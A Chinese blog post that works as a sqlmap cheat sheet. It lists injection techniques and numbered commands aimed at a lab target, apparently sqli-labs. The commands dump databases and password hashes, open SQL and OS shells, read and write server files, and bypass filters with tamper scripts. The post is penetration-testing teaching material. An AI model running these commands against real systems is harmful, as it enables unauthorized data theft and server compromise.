首页 技术 正文
技术 2022年11月20日
0 收藏 914 点赞 4,917 浏览 3677 个字

Sqlmap

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等

Sqlmap采用了以下5种独特的SQL注入技术

  • 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入
  • 基于时间的盲注,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已经执行(即页面返回时间是否增加)来判断
  • 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中
  • 联合查询注入,在可以使用Union的情况下注入
  • 堆叠查询注入,可以同时执行多条语句时的注入

Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意的系统命令。

sqlmap是一个跨平台的工具,很好用,是SQL注入方面一个强大的工具!

我们可以使用 -h 参数查看sqlmap的参数以及用法,sqlmap -h

to see full list of options run with ‘-hh’

sqlmap5中安全级别

Sqlmap 3种风险级别

1   Sqlmap的基本用法

1.sqlmap -r http.txt  #http.txt是我们抓取的http的请求包

2.sqlmap -r http.txt -p username  #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测

3.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1”   #探测该url是否存在漏洞

4.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1″   –cookie=”抓取的cookie”   #当该网站需要登录时,探测该url是否存在漏洞

注:当“–level”设置为2或更高时,Sqlmap会检测cookie是否存在注入漏洞

sqlmap.py -u “http://192.168.56.102:8080/user.php” –cookie “JSESSIONID=E5D6C8C81;NAME=werner;”

5.sqlmap -u “http://192.168.10.1/sqli/Less-1/”  –data=”uname=admin&passwd=admin&submit=Submit”  #抓取其post提交的数据填入

6.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” –users #查看数据库的所有用户

7.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” –passwords #查看数据库用户名的密码

8.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” –current-user  #查看数据库当前的用户

9.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” –is-dba  #判断当前用户是否有管理员权限

10.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” –roles   #列出数据库所有管理员角色

11.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” –dbs     #爆出所有的数据库

12.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” –tables  #爆出所有的数据表

13.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” –columns  #爆出数据库中所有的列

14.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” –current-db #查看当前的数据库

15.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” -D security –tables #爆出数据库security中的所有的表

16.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” -D security -T users –columns #爆出security数据库中users表中的所有的列

17.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” -D security -T users -C username –dump  #爆出数据库security中的users表中的username列中的所有数据

18.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” -D security -T users –dump-all #爆出数据库security中的users表中的所有数据

19.sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” -D security –dump-all   #爆出数据库security中的所有数据

20. sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” –dump-all  #爆出该数据库中的所有数据

21. sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1”  –tamper=space2comment.py  #指定脚本进行过滤,用/**/代替

22. sqlmap -u “http://192.168.10.1/sqli/Less-4/?id=1” –level=5 –risk=3 #探测等级5,平台危险等级3,都是最高级别

23. sqlmap -u “http://192.168.10.1/sqli/Less-1/?id=1” –sql-shell  #执行指定的sql查询语句

24. sqlmap -u “http://192.168.10.1/sqli/Less-4/?id=1″ –os-shell  #执行–os-shell命令  (需要在mysql目录my.ini文件下添加入secure_file_priv=””)

25. sqlmap -u “http://192.168.10.1/sqli/Less-4/?id=1” –file-read “c:/test.txt” #读取目标服务器C盘下的test.txt文件

26. sqlmap -u “http://192.168.10.1/sqli/Less-4/?id=1” –file-write test.txt –file-dest “e:/hack.txt”  #将本地的test.txt文件上传到目标服务器的E盘下,并且名字为hack.txt

27. sqlmap -u “http://192.168.10.1/sqli/Less-4/?id=1″ –dbms=”MySQL”     #指定其数据库为mysql Firebird, HSQLDB, IBM DB2, Informix, Microsoft Access, Microsoft SQL Server, MySQL, Oracle, PostgreSQL, SAP MaxDB, SQLite, Sybase

28. sqlmap -u “http://192.168.10.1/sqli/Less-4/?id=1” –random-agent   #使用任意的User-Agent爆破

29. sqlmap -u “http://192.168.10.1/sqli/Less-4/?id=1″ –proxy=”127.0.0.1:8080”    #指定代理

30. sqlmap -u “http://192.168.10.1/sqli/Less-4/?id=1” –technique T #指定时间延迟注入

31. -v3              输出详细度  最大值5 会显示请求包和回复包

32. –threads 5      指定线程数

33. –fresh-queries  清除缓存

34. –flush-session  刷新session

35. –batch          对所有的交互式的都是默认的

36. –random-agent   任意的http头

37. –tamper base64encode    对提交的数据进行base64编码

38. –keep-alive     保持连接,当出现 [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s) 保错的时候,使用这个参数

相关推荐
python开发_常用的python模块及安装方法
adodb:我们领导推荐的数据库连接组件bsddb3:BerkeleyDB的连接组件Cheetah-1.0:我比较喜欢这个版本的cheeta…
日期:2022-11-24 点赞:878 阅读:9,493
Educational Codeforces Round 11 C. Hard Process 二分
C. Hard Process题目连接:http://www.codeforces.com/contest/660/problem/CDes…
日期:2022-11-24 点赞:807 阅读:5,907
下载Ubuntn 17.04 内核源代码
zengkefu@server1:/usr/src$ uname -aLinux server1 4.10.0-19-generic #21…
日期:2022-11-24 点赞:569 阅读:6,740
可用Active Desktop Calendar V7.86 注册码序列号
可用Active Desktop Calendar V7.86 注册码序列号Name: www.greendown.cn Code: &nb…
日期:2022-11-24 点赞:733 阅读:6,495
Android调用系统相机、自定义相机、处理大图片
Android调用系统相机和自定义相机实例本博文主要是介绍了android上使用相机进行拍照并显示的两种方式,并且由于涉及到要把拍到的照片显…
日期:2022-11-24 点赞:512 阅读:8,133
Struts的使用
一、Struts2的获取  Struts的官方网站为:http://struts.apache.org/  下载完Struts2的jar包,…
日期:2022-11-24 点赞:671 阅读:5,297